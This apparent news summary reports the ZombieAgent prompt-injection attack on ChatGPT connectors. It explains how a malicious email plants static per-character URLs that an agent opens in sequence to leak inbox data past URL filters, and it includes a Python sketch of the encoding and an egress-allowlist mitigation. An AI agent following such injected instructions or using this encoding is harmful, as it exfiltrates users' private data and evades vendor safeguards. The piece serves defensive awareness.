Cybersecurity News and Headlines

Cybersecurity Pulse

Cybersecurity

New Zero-Click Attack Lets Attackers Steal ChatGPT User Data

Infosecurity Magazine • January 8, 2026

Companies Mentioned

  • OpenAI
  • Radware (RDWR)
  • Google (GOOG)
  • GitHub

Why It Matters

ZombieAgent proves that AI‑driven agents can become silent data‑exfiltration vectors, threatening enterprise confidentiality and prompting urgent security reassessments. Its zero‑click nature raises the stakes for organizations that rely on ChatGPT connectors without robust monitoring.

Key Takeaways

  • ZombieAgent bypasses OpenAI URL filters
  • Exfiltrates data character by character using pre‑built URLs
  • Zero‑click variant runs without any user interaction
  • One‑click variant needs only a single user click
  • Persistence allows ongoing theft of ChatGPT conversation data

Pulse Analysis

The rapid rollout of agentic features in large language models, such as OpenAI’s Connectors, has transformed how businesses automate workflows. By linking ChatGPT directly to email, cloud storage, and code repositories, enterprises gain productivity but also expose a new attack surface. Traditional perimeter defenses struggle to see inside AI‑driven interactions, making prompt‑injection vectors an emerging priority for security teams.

ZombieAgent exploits this gap by embedding a dictionary of static URLs, each representing a single character, into a malicious email. When a user asks ChatGPT to perform a routine task, the model reads the inbox, maps extracted data to the corresponding URLs, and opens them sequentially. Because the URLs are pre‑constructed, OpenAI’s filters that block dynamic URL generation never trigger, allowing data to leak character by character without any additional user clicks. The method demonstrates both zero‑click and one‑click variants, and can be made persistent to harvest ongoing conversation content.
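To make the evasion concrete, the encoding step can be sketched as follows. This is our own illustration of the general technique, not code from the Radware research; the domain name and URL scheme are hypothetical, and no network requests are made.

```python
import string

ATTACKER_DOMAIN = "https://attacker.example"  # hypothetical domain for illustration

# Pre-built dictionary: one static URL per printable character, constructed
# in advance and embedded in the malicious prompt. Nothing is generated at
# exfiltration time.
CHAR_URLS = {c: f"{ATTACKER_DOMAIN}/{ord(c):03d}" for c in string.printable}

def encode_as_urls(secret: str) -> list[str]:
    """Map each character of the target text to its pre-existing URL.

    Because every URL already exists in the dictionary, a guardrail that
    only blocks dynamically constructed URLs sees nothing new; the
    attacker's server reconstructs the secret from the sequence of
    requested paths."""
    return [CHAR_URLS[c] for c in secret if c in CHAR_URLS]

# Example: three characters leak as three separate "harmless" URL opens.
urls = encode_as_urls("pwd")
```

The point of the sketch is that the sensitive content never appears in any single URL; it is recoverable only from the order in which the static URLs are fetched, which is why per-URL filtering fails.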

For organizations, the discovery signals a need to reassess AI integration policies. Deploying strict monitoring of outbound requests, employing AI‑aware DLP solutions, and limiting the scope of connector permissions are immediate mitigations. Vendors, including OpenAI, must evolve guardrails beyond simple URL rewriting, perhaps by sandboxing external calls or requiring explicit user consent for each exfiltration attempt. As AI agents become more autonomous, the industry will likely see a wave of regulatory guidance and security standards aimed at curbing silent data‑theft techniques like ZombieAgent.
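One of the mitigations above, strict monitoring of outbound requests, can be reduced to a simple egress allowlist check. This is a minimal sketch of our own, not a feature of any vendor product, and the hostnames in the policy are examples only.

```python
from urllib.parse import urlparse

# Example egress policy: only hosts an agent legitimately needs.
ALLOWED_HOSTS = {"api.openai.com", "github.com"}

def outbound_allowed(url: str) -> bool:
    """Permit an agent-initiated request only if its host is allowlisted.

    A deny-by-default egress policy defeats the static-URL trick entirely:
    the per-character URLs point at an unknown host, so every one of them
    is dropped regardless of how the URL was constructed."""
    host = urlparse(url).hostname or ""
    return host in ALLOWED_HOSTS
```

A proxy enforcing this check would block `https://attacker.example/097` while still permitting legitimate connector traffic, which is the behavioral difference URL-rewriting filters fail to capture.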
